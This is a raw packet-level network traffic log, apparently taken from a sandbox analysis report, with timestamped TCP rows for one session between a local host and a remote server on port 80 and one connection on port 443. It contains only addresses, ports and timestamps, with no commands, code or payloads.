Aug 23, 2022 03:42:58.026482105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026494980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026515007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026531935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026561975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026606083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026623964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026644945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026644945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026650906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026673079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026706934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026717901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026745081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026762962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026777983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026806116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026835918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026835918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026859999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026896954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027218103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027256012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027299881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027328968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027328014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027375937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027391911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027395964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027437925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027478933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027498007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027507067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027533054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027574062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.027918100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027960062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.027990103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.028002024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028012037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.028031111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028057098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.028090954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.028739929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028784037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028822899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028852940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.028861046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.028934956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.032064915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.045242071 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:42:58.045267105 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:42:58.052989960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053033113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053073883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053105116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053143024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053169966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053185940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053215027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053222895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053226948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053227901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053255081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053283930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053294897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053296089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053337097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053356886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053376913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053406954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.053438902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.053456068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054459095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054501057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054541111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054570913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054598093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054614067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054661036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054662943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054701090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054708004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054721117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054733992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054790974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.054927111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.054970980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055016041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055027962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.055051088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055092096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055110931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.055133104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055171967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055186033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.055200100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.055228949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.055241108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056066036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056108952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056149006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056176901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056190968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056210995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056252003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056288958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056332111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056370020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056397915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056397915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056427956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056461096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056463957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056505919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056545019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056555986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056574106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056593895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056617975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056634903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056657076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056674957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056695938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056725979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056759119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056763887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056777000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056803942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056843042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056864977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056870937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.056890011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.056924105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057225943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057266951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057296038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057308912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057339907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057353973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057372093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057383060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057570934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057612896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057651997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057674885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057678938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057703972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057723045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057773113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057816029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057832956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057853937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057883024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.057909012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.057929993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.058314085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058352947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058412075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058434010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.058454990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058475971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.058494091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058495998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.058535099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058564901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.058597088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.058631897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059068918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059109926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059149981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059171915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059180975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059192896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059273958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059396029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059487104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059497118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059529066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059573889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059626102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059665918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059683084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059724092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059757948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059765100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059793949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059793949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059825897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059834003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059853077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059875011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059914112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059937954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059942961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.059974909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.059993982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085275888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085344076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085385084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085385084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085414886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085422993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085429907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085454941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085479975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085494995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085499048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085536003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085575104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085583925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085613966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085623026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085654974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085684061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085705996 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085724115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085726023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085762978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085769892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085803032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085805893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.085833073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.085879087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.086452961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086498022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086538076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086560011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.086564064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086638927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.086661100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086702108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086740971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086750984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.086769104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.086795092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.086807966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.087006092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087052107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087090015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087109089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.087117910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087158918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087178946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.087199926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.087229967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087269068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087301016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.087323904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.087347984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088252068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088296890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088337898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088366032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088377953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088409901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088418961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088459969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088501930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088543892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088556051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088572979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088612080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088627100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088651896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088658094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088691950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088720083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088742018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088756084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088762045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088800907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088841915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088850975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088876963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088923931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088932037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.088965893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.088973045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089006901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089035034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089060068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089072943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089076996 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089112043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089123964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089153051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089184999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089224100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089235067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089739084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089778900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089801073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089818954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089823961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089850903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089890003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089903116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089931965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089941978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089972973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.089979887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.089999914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090018034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090039015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090141058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090189934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090210915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090250969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090285063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090300083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090326071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090365887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090374947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090408087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090437889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090477943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090480089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090491056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090523005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090564013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090573072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090593100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090697050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090826988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090867996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090907097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090913057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.090934992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.090976954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091099977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091139078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091181040 CEST	80	49774	45.95.11.158	192.168.2.3
